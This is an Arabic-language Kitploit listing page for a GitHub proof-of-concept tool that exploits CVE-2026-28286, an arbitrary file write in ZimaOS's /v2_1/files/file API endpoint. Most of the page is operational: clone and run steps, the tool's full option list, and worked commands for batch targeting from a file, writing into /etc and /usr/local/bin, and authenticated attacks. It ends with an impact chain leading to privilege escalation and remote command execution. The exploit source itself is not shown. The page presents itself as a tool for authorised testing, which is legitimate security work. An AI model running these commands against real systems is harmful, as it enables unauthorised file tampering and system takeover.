Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
zimaos-cve-2026-28286-arbitrary-file-write — أداة إثبات المفهوم والتحقق لثغرة CVE-2026-28286، وهي ثغرة كتابة ملفات عشوائية في ZimaOS، تستغل سوء تكوين واجهة برمجة التطبيقات لكتابة ملفات خارج الدلائل المقصودة. | Kitploit
أدوات/GitHubGitHub/rushi9/zimaos-cve-2026-28286-arbitrary-file-write
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار أمان APIأمن الويباختبار الاختراق
GitHubrushi9/zimaos-cve-2026-28286-arbitrary-file-write

zimaos-cve-2026-28286-arbitrary-file-write

أداة إثبات المفهوم والتحقق لثغرة CVE-2026-28286، وهي ثغرة كتابة ملفات عشوائية في ZimaOS، تستغل سوء تكوين واجهة برمجة التطبيقات لكتابة ملفات خارج الدلائل المقصودة.

عرض المستودعالموقع الإلكتروني
21منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2026-28286 — كتابة ملفات عشوائية في ZimaOS

من سوء تكوين واجهة برمجة التطبيقات → كتابة ملفات عشوائية → احتمال اختراق النظام

⚡ خلاصة سريعة

  • نقطة النهاية: /v2_1/files/file
  • المشكلة: لا يوجد تحقق من المسار
  • الأثر: كتابة ملفات عشوائية خارج الدليل المقصود
  • الخطورة: 🔴 حرجة

🧪 بدء سريع

root@kitploit:~
git clone https://github.com/Rushi9/zimaos-cve-2026-28286-arbitrary-file-write.git
cd zimaos-cve-2026-28286-arbitrary-file-write
pip install -r requirements.txt
python3 poc.py

⚙️ استخدام سطر الأوامر

يمكنك عرض جميع الخيارات المتاحة باستخدام:

root@kitploit:~
python poc.py -h

📌 الخيارات المتاحة

root@kitploit:~
usage: poc.py [-h] [-u URL] [-t TARGETS] [-p PATH] [--proxy PROXY] [--token TOKEN] [-n ATTEMPTS] [--delay DELAY]

options:
  -h, --help            show help message and exit
  -u, --url URL         Single target URL
  -t, --targets TARGETS Targets file (batch mode)
  -p, --path PATH       Custom file path (default: /tmp)
  --proxy PROXY         Proxy URL (e.g., http://127.0.0.1:8080)
  --token TOKEN         Bearer authentication token
  -n, --attempts        Number of attempts
  --delay               Delay between batch requests (seconds)

🚀 أمثلة الاستخدام

▶️ 1. الوضع التفاعلي

root@kitploit:~
python poc.py

▶️ 2. هدف واحد

root@kitploit:~
python poc.py -u http://localhost:8080

▶️ 3. مسار مخصص

root@kitploit:~
python poc.py -u http://localhost:8080 -p /tmp

▶️ 4. استهداف مسار حساس (اختبار معملي)

root@kitploit:~
python poc.py -u http://localhost:8080 -p /etc

▶️ 5. محاولات متعددة

root@kitploit:~
python poc.py -u http://localhost:8080 -n 5

▶️ 6. استخدام بروكسي (Burp Suite)

root@kitploit:~
python poc.py -u http://localhost:8080 --proxy http://127.0.0.1:8080

▶️ 7. وضع الدفعات

root@kitploit:~
python poc.py -t targets.txt

▶️ 8. وضع الدفعات مع تأخير

root@kitploit:~
python poc.py -t targets.txt --delay 2

▶️ 9. وضع الطاقة الكاملة (جميع الخيارات)

root@kitploit:~
python poc.py -u http://target.com -p /tmp -n 3 --proxy http://127.0.0.1:8080 --token YOUR_TOKEN

💡 نصيحة

استخدم وضع البروكسي مع Burp Suite من أجل:

  • فحص الطلبات
  • تعديل الحمولات
  • تأكيد سلوك الخادم الخلفي

🧠 التحليل الفني

يفشل الخادم الخلفي في فرض حدود نظام الملفات:

  • ❌ لا يوجد توحيد للمسار
  • ❌ لا يوجد تقييد للدليل الأساسي
  • ❌ مسارات مطلقة يتحكم بها المستخدم

وهذا يسمح بالكتابة إلى:

root@kitploit:~
/tmp/
/etc/
/usr/local/bin/

💥 الأثر

root@kitploit:~
كتابة ملفات عشوائية
        ↓
استبدال الإعدادات / البرامج النصية
        ↓
تصعيد الامتيازات / تنفيذ أوامر عن بُعد


🎥 عرض توضيحي

image

📁 مثال على المخرجات

root@kitploit:~
[✔] CONFIRMED vulnerable (LISTING_SUCCESS)
Path: /tmp/CVE-2026-28286_⚠️_abc123.txt

⭐ الدعم

إذا وجدت هذا مفيدًا، فكر في منح نجمة ⭐ فهذا يساعد المزيد من الباحثين على اكتشاف هذا العمل.


⚠️ إخلاء مسؤولية

للاستخدام في الاختبارات المصرح بها فقط.

تنزيل الأداة